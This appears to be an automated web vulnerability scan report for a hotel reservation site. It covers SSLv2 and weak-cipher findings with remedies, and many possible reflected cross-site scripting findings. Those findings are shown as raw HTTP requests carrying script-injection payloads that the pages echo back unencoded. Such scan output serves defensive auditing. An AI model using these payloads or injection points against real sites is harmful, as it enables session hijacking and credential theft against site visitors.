GET /copy1/webview.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C%7C%B2%A8%95J%9B%9D%A8%B4%BE%A8%93w%AE%8D%AF%BD%A7%C7%BF%A2y%84%93%A2%BBh HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 03:57:55 GMT
X-Powered-By: ASP.NET
Content-Length: 473
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCADAAARA=KNCOLOPACJONFJEFEPJIPOOA; path=/
Cache-control: private



<HTML>
<HEAD>
<title>Online Reservation</title>

<script type="text/javascript">
if(parent.frames.length!=0) {
window.top.location.replace(document.location.href) }
else {}
</script>


</head>

<frameset rows='*' frameborder="NO" border="0" framespacing="0">

<frame name="mainFrame" src="ResMain.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C">

</frameset>
<noframes></body></noframes>
<test main>
</html>
Insecure Transportation Security Protocol (SSLv2) Supported

Insecure Transportation Security Protocol (SSLv2) Supported

1 TOTAL
MEDIUM
CONFIRMED
1
Netsparker detected that your web server is configured to support secure communication over an insecure transporation protocol (SSLv2).

SSLv2 is an insecure protocol and has several flaws. Your secure traffic can be observed when you have established it over SSLv2.

Impact

Attackers can perform MITM attacks and observe the encryption traffic beetwen your website and the visitors.

Remedy

Configure your webserver to disallow using weak ciphers.

For Apache, you should modify the SSLProtocol directive in the httpd.conf.

	SSLProtocol -ALL +SSLv3 +TLSv1

For Microsoft IIS, you should make some changes on the system registry.

  • Click Start, click Run, type regedt32 or type regedit, and then click OK.
  • In Registry Editor, locate the following registry key : HKey_Local_Machine\System\CurrentControlSet\Control\SecurityProviders \SCHANNEL\Protocols\SSL2\Server
  • There may or may not be a DWORD value named 'Enabled'.
  • Type 00000000 in Binary Editor to set the value of the new key equal to "0".

External References

Classification

PCI v1.2-6.5.9 PCI v2.0-6.5.4 WASC-04
- /copy1/webview.asp

/copy1/webview.asp CONFIRMED

https://www.superinn.com/copy1/webview.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7..

Request

GET /copy1/webview.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C%7C%B2%A8%95J%9B%9D%A8%B4%BE%A8%93w%AE%8D%AF%BD%A7%C7%BF%A2y%84%93%A2%BBh HTTP/1.0
Accept: */*
Host: www.superinn.com

Response

[NETSPARKER] SSL Connection[NETSPARKER] SSL Connection
Weak Ciphers Detected

Weak Ciphers Detected

1 TOTAL
MEDIUM
CONFIRMED
1
Netsparker detected your web server is configured to allow using weak ciphers during secure communication (SSL).

You should allow only strong ciphers on your web server to protect your secure communication with your visitors.

Impact

Attackers can mount brute-force attacks to decrypt your secure communication between your server and the visitors.

Remedy

Configure your webserver to disallow using weak ciphers.

For Apache, you should modify the SSLCipherSuite directive in the httpd.conf.

	SSLCipherSuite ALL:!aNULL:!ADH:!eNULL:!LOW:!EXP:RC4+RSA:+HIGH:+MEDIUM

For Microsoft IIS, you should make some changes to the system registry.

  • Click Start, click Run, type regedt32 or type regedit, and then click OK.
  • In Registry Editor, locate the following registry key : HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders
  • Set "Enabled" DWORD to "0x0" for the following registry keys:
    SCHANNEL\Ciphers\DES 56/56
    SCHANNEL\Ciphers\RC4 64/128
    SCHANNEL\Ciphers\RC4 40/128
    SCHANNEL\Ciphers\RC2 56/128
    SCHANNEL\Ciphers\RC2 40/128
    SCHANNEL\Ciphers\NULL
    SCHANNEL\Hashes\MD5
    

External References

Classification

PCI v1.2-6.5.9 PCI v2.0-6.5.4 WASC-04
- /copy1/webview.asp

/copy1/webview.asp CONFIRMED

https://www.superinn.com/copy1/webview.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7..

List of Supported Weak Ciphers

  • SSL_DES_64_CBC_WITH_MD5
  • SSL_RC4_128_EXPORT40_WITH_MD5
  • SSL_RC2_128_CBC_EXPORT40_WITH_MD5
  • TLS_RSA_WITH_DES_CBC_SHA
  • TLS_RSA_EXPORT1024_WITH_RC4_56_SHA
  • TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA
  • TLS_RSA_RC4_40_MD5
  • TLS_RSA_RC2_40_MD5

Request

GET /copy1/webview.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C%7C%B2%A8%95J%9B%9D%A8%B4%BE%A8%93w%AE%8D%AF%BD%A7%C7%BF%A2y%84%93%A2%BBh HTTP/1.0
Accept: */*
Host: www.superinn.com

Response

[NETSPARKER] SSL Connection[NETSPARKER] SSL Connection
[Possible] Cross-site Scripting

[Possible] Cross-site Scripting

25 TOTAL
MEDIUM
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

Netsparker believes that there is a XSS (Cross-site Scripting) in here it could not confirm it. We strongly recommend investigating the issue manually to ensure that it is an XSS (Cross-site Scripting) and needs to be addressed.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hi-jacking users' active session
  • Changing the look of the page within the victims browser.
  • Mounting a successful phishing attack.
  • Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered / encoded. Output should be filtered / encoded according to the output format and location.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

Classification

OWASP A2 PCI v1.2-6.5.1 PCI v2.0-6.5.7 CWE-79 CAPEC-19 WASC-08
- /copy1/webview.asp

/copy1/webview.asp

https://www.superinn.com/copy1/webview.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert..

Parameters

Parameter Type Value
crypt GET '"--></style></script><script>alert(0x00003B)</script>

Request

GET /copy1/webview.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00003B)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=KNCOLOPACJONFJEFEPJIPOOA
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 03:58:25 GMT
X-Powered-By: ASP.NET
Content-Length: 361
Content-Type: text/html
Cache-control: private



<HTML>
<HEAD>
<title>Online Reservation</title>

<script type="text/javascript">
if(parent.frames.length!=0) {
window.top.location.replace(document.location.href) }
else {}
</script>
We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:'"--></style></script><script>netsparker(0x00003B)</script><br>
- /copy1/ResMain.asp

/copy1/ResMain.asp

https://www.superinn.com/copy1/ResMain.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert..

Parameters

Parameter Type Value
crypt GET '"--></style></script><script>alert(0x00006C)</script>

Request

GET /copy1/ResMain.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00006C)%3C/script%3E HTTP/1.1
Referer: https://www.superinn.com/copy1/webview.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C%7C%B2%A8%95J%9B%9D%A8%B4%BE%A8%93w%AE%8D%AF%BD%A7%C7%BF%A2y%84%93%A2%BBh
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=KNCOLOPACJONFJEFEPJIPOOA
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 03:58:31 GMT
X-Powered-By: ASP.NET
Content-Length: 164
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:'"--></style></script><script>netsparker(0x00006C)</script><br>
- /copy1/webviewstyle.asp

/copy1/webviewstyle.asp

https://www.superinn.com/copy1/webviewstyle.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3E..

Parameters

Parameter Type Value
crypt GET '"--></style></script><script>alert(0x000082)</script>

Request

GET /copy1/webviewstyle.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000082)%3C/script%3E HTTP/1.1
Referer: https://www.superinn.com/copy1/ResMain.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=OOCOLOPAFGCMOAILKDGABGLE
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 03:58:41 GMT
X-Powered-By: ASP.NET
Content-Length: 164
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:'"--></style></script><script>netsparker(0x000082)</script><br>
- /copy1/Res_3.asp

/copy1/Res_3.asp

https://www.superinn.com/copy1/Res_3.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0..

Parameters

Parameter Type Value
crypt GET '"--></style></script><script>alert(0x000098)</script>

Request

GET /copy1/Res_3.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000098)%3C/script%3E HTTP/1.1
Referer: https://www.superinn.com/copy1/ResMain.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=OOCOLOPAFGCMOAILKDGABGLE
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 03:58:53 GMT
X-Powered-By: ASP.NET
Content-Length: 164
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:'"--></style></script><script>netsparker(0x000098)</script><br>
- /copy1/Res_1.asp

/copy1/Res_1.asp

https://www.superinn.com/copy1/Res_1.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0..

Parameters

Parameter Type Value
crypt GET '"--></style></script><script>alert(0x0000AE)</script>

Request

GET /copy1/Res_1.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000AE)%3C/script%3E HTTP/1.1
Referer: https://www.superinn.com/copy1/ResMain.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=OOCOLOPAFGCMOAILKDGABGLE
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 03:59:06 GMT
X-Powered-By: ASP.NET
Content-Length: 164
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:'"--></style></script><script>netsparker(0x0000AE)</script><br>
- /copy1/Res_2.asp

/copy1/Res_2.asp

https://www.superinn.com/copy1/Res_2.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0..

Parameters

Parameter Type Value
crypt GET '"--></style></script><script>alert(0x0000D8)</script>

Request

GET /copy1/Res_2.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000D8)%3C/script%3E HTTP/1.1
Referer: https://www.superinn.com/copy1/ResMain.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=OOCOLOPAFGCMOAILKDGABGLE
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 03:59:25 GMT
X-Powered-By: ASP.NET
Content-Length: 164
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:'"--></style></script><script>netsparker(0x0000D8)</script><br>
- /copy1/res_avail.asp

/copy1/res_avail.asp

https://www.superinn.com/copy1/res_avail.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eale..

Parameters

Parameter Type Value
crypt GET '"--></style></script><script>alert(0x000104)</script>

Request

GET /copy1/res_avail.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000104)%3C/script%3E HTTP/1.1
Referer: https://www.superinn.com/copy1/Res_3.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=MBDOLOPADOELCGIFCEGGLPMB
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 03:59:49 GMT
X-Powered-By: ASP.NET
Content-Length: 164
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:'"--></style></script><script>netsparker(0x000104)</script><br>
- /copy1/res_avail.asp

/copy1/res_avail.asp

https://www.superinn.com/copy1/res_avail.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eale..

Parameters

Parameter Type Value
crypt GET '"--></style></script><script>alert(0x000108)</script>
text2 POST 1

Request

POST /copy1/res_avail.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000108)%3C/script%3E HTTP/1.1
Referer: https://www.superinn.com/copy1/Res_3.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=MBDOLOPADOELCGIFCEGGLPMB
Content-Length: 7
Expect: 100-continue
Accept-Encoding: gzip, deflate

text2=1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:00:30 GMT
X-Powered-By: ASP.NET
Content-Length: 164
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:'"--></style></script><script>netsparker(0x000108)</script><br>
- /copy1/res_1_BNR.asp

/copy1/res_1_BNR.asp

https://www.superinn.com/copy1/res_1_BNR.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eale..

Parameters

Parameter Type Value
crypt GET '"--></style></script><script>alert(0x000156)</script>

Request

GET /copy1/res_1_BNR.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000156)%3C/script%3E HTTP/1.1
Referer: https://www.superinn.com/copy1/Res_1.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=MBDOLOPADOELCGIFCEGGLPMB
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:01:19 GMT
X-Powered-By: ASP.NET
Content-Length: 164
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:'"--></style></script><script>netsparker(0x000156)</script><br>
- /copy1/Res_2Send.asp

/copy1/Res_2Send.asp

https://www.superinn.com/copy1/Res_2Send.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eale..

Parameters

Parameter Type Value
crypt GET '"--></style></script><script>alert(0x00019B)</script>

Request

GET /copy1/Res_2Send.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00019B)%3C/script%3E HTTP/1.1
Referer: https://www.superinn.com/copy1/Res_2.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=MBDOLOPADOELCGIFCEGGLPMB
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:02:38 GMT
X-Powered-By: ASP.NET
Content-Length: 164
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:'"--></style></script><script>netsparker(0x00019B)</script><br>
- /copy1/webroom.asp

/copy1/webroom.asp

https://www.superinn.com/copy1/webroom.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert..

Parameters

Parameter Type Value
crypt GET '"--></style></script><script>alert(0x00020A)</script>
Rnum GET 3

Request

GET /copy1/webroom.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00020A)%3C/script%3E&Rnum=3 HTTP/1.1
Referer: https://www.superinn.com/copy1/res_avail.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=FJDOLOPAFCLNHGBMFFHFHCPM
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:03:56 GMT
X-Powered-By: ASP.NET
Content-Length: 164
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:'"--></style></script><script>netsparker(0x00020A)</script><br>
- /copy1/Res_1.asp

/copy1/Res_1.asp

https://www.superinn.com/copy1/Res_1.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0..

Parameters

Parameter Type Value
crypt GET '"--></style></script><script>alert(0x00020B)</script>
mdate GET 8/14/2011
rnum GET 1

Request

GET /copy1/Res_1.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00020B)%3C/script%3E&mdate=8/14/2011&rnum=1 HTTP/1.1
Referer: https://www.superinn.com/copy1/res_avail.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=FJDOLOPAFCLNHGBMFFHFHCPM
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:04:10 GMT
X-Powered-By: ASP.NET
Content-Length: 164
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:'"--></style></script><script>netsparker(0x00020B)</script><br>
- /copy1/wrong.asp

/copy1/wrong.asp

https://www.superinn.com/copy1/wrong.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0..

Parameters

Parameter Type Value
crypt GET '"--></style></script><script>alert(0x000244)</script>

Request

GET /copy1/wrong.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000244)%3C/script%3E HTTP/1.1
Referer: https://www.superinn.com/copy1/Res_2Send.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=FJDOLOPAFCLNHGBMFFHFHCPM
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:04:38 GMT
X-Powered-By: ASP.NET
Content-Length: 164
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:'"--></style></script><script>netsparker(0x000244)</script><br>
- /copy1/Res_2Send.asp

/copy1/Res_2Send.asp

https://www.superinn.com/copy1/Res_2Send.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eale..

Parameters

Parameter Type Value
crypt GET '"--></style></script><script>alert(0x00024B)</script>
text2 POST 3
text1 POST 3
Submit POST VIEW

Request

POST /copy1/Res_2Send.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00024B)%3C/script%3E HTTP/1.1
Referer: https://www.superinn.com/copy1/Res_2.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=FJDOLOPAFCLNHGBMFFHFHCPM
Content-Length: 27
Expect: 100-continue
Accept-Encoding: gzip, deflate

text2=3&text1=3&Submit=VIEW

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:05:28 GMT
X-Powered-By: ASP.NET
Content-Length: 164
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:'"--></style></script><script>netsparker(0x00024B)</script><br>
- /copy1/res_1_B.asp

/copy1/res_1_B.asp

https://www.superinn.com/copy1/res_1_B.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert..

Parameters

Parameter Type Value
crypt GET '"--></style></script><script>alert(0x000285)</script>

Request

GET /copy1/res_1_B.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000285)%3C/script%3E HTTP/1.1
Referer: https://www.superinn.com/copy1/Res_1.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C&mdate=8/14/2011&rnum=1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=HODOLOPAHMABPMFNCAABJGKP
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:06:19 GMT
X-Powered-By: ASP.NET
Content-Length: 164
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:'"--></style></script><script>netsparker(0x000285)</script><br>
- /copy1/res_avail.asp

/copy1/res_avail.asp

https://www.superinn.com/copy1/res_avail.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eale..

Parameters

Parameter Type Value
crypt GET '"--></style></script><script>alert(0x000289)</script>
text1 POST 8/11/2011
text2 POST 12
Submit2 POST VIEW CHART
BUTTON2 POST RETURN TO MENU

Request

POST /copy1/res_avail.asp?crypt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000289)%3C/script%3E HTTP/1.1
Referer: https://www.superinn.com/copy1/Res_3.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.superinn.com
